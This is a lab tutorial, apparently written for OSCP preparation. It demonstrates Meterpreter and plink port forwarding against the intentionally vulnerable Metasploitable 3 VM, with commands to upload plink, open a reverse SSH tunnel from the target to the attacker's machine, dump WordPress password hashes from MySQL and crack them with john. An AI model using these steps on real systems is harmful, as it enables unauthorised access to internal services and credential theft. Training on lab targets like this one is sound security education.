This is the Metasploitable 3 port forwarding tutorial, port forwarding is something that can extremely confusing but really it is meant to be simple. With the OSCP exam in mind I decided to write this tutorial for how to use several port forwarding techniques demonstrating on the Metasploitable 3 host.
Metasploitable 3 has many vulnerable apps installed that can help you get better on ethical hacking, have you tried ManageEngine Desktop Central yet? See how I think it should be done in the tutorial.
Keep in mind that by using Meterpreter’s port forwarding capabilities that will count as the one permitted allowance usage for Metasploit on the OSCP exam.
Table of Contents
Local Services Unreachable
Remote port forwarding is for when you want to access to a service on an internal network. Notice how when we run Nmap against the Metasploitable 3 host the port TCP 3306 was not open? This is for a solid reason.
TCP-3306 is the MySQL port. Database connections are not supposed to be open to everything on the network that is why they are purposefully closed off. This usually means the MySQL server is configured to be listening on localhost only.
Meterpreter Port Forwarding
Using Meterpreter for port forwarding is different from other tools in that we only define the remote target host instead of our local host which would be Kali. We are also going to be forwarding our local traffic on the local port of the Kali VM to the remote Metasploitable 3 host.
meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]
OPTIONS:
-L >opt> The local host to listen on (optional).
-h Help banner.
-l >opt> The local port to listen on.
-p >opt> The remote port to connect on.
-r >opt> The remote host to connect on.
Forwarding local port 3306 to remote port 3306 on Metasploitable 3.
portfwd add -l 3306 -p 3306 -r 192.168.56.101
Once that TCP relay is established we then can access the MySQL service by running Kali’s builtin MySQL client.
mysql -u root -h 127.0.0.1
Common Issues
Issue: I am getting this error message: “root@kali:/# mysql -u root -h localhost ERROR 2002 (HY000): Can’t connect to local MySQL server through socket ‘/var/run/mysqld/mysqld.sock’ (2)”
Solution: add -h before 127.0.0.1
mysql -u root -h 127.0.0.1Plink Remote Port Forwarding
Plink is another way to setup remote port forwarding. Plink is the CLI version of Putty, a Windows SSH client.
After doing remote port forwarding using Meterpreter in the last step my local Kali VM is now listening on TCP-3306. What that means is I have forwarded the MySQL service traffic to my local port TCP-3306.
First upload plink to the target.
meterpreter > upload /usr/share/windows-binaries/plink.exe
[*] uploading : /usr/share/windows-binaries/plink.exe -> plink.exe
[*] Uploaded 304.00 KiB of 304.00 KiB (100.0%): /usr/share/windows-binaries/plink.exe -> plink.exe
[*] uploaded : /usr/share/windows-binaries/plink.exe -> plink.exeStart the Kali Linux SSH Server
So we now know that plink is a Windows CLI Putty client, how does it work with regard to Kali Linux? In general these are the three steps for using plink with Kali Linux:
- Start the SSH server on Kali Linux – service ssh start
- Run plink on the Windows target – plink {attacker-ip} -R {remote-port}{local-ip}:{local-port}
- Login to the service being forwarded. e.g. MySQL – mysql -u root -h 127.0.0.1
Upon running the plink command as outlined above in the steps overview of the process, you will be prompted for a login credentials to the Kali SSH server. You have two options for this:
- Create a new user and grant access to that user to login to the SSH server.
- Permit the root user of Kali to login to the SSH server.
For convenience I choose the second option. In order to do so though one change needs to be made in our configuration settings.
If you have not already you will need to add a line or uncomment a line depending on your VM, in /etc/ssh/sshd_config. And that one line is PermitRootLogin yes in that order.
root@kali:~# service ssh start
root@kali:~# nano /etc/ssh/sshd_config
root@kali:~# service ssh restartNow with a shell open on the target run the plink command.
plink 192.168.56.102 -R 9609:127.0.0.1:3306
I now have access to the Metasploitable 3 host’s local MySQL service on my local Kali VM’s TCP-9609 port. So now we can check that is in fact happening by running netstat on Kali.
netstat -antup | grep 3306
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 4079/ruby Your results for net stat should look something similar as this above.
mysql -u root -h 127.0.0.1 --port 9609You can always escape the plink session by using the exit command!
Common Issues
Issue: I am getting this error: “
C:\ManageEngine\DesktopCentral_Server\bin>plink 192.168.56.102 -R 1234:127.0.0.1:3306
plink 192.168.56.102 -R 1234:127.0.0.1:3306
FATAL ERROR: Network error: Connection refused “
Solution: Try another port. e.g. plink 192.168.56.102 -R 9609:127.0.0.1:3306
Exploit
Now we can exploit the database since I have root access to it by dumping the passwords for all the users found in the wp_users table.
select user_login, user_pass from wp_users;
From there it is trivial to crack the password hashes.
john --wordlist=/usr/share/wordlists/rockyou.txt wp_users 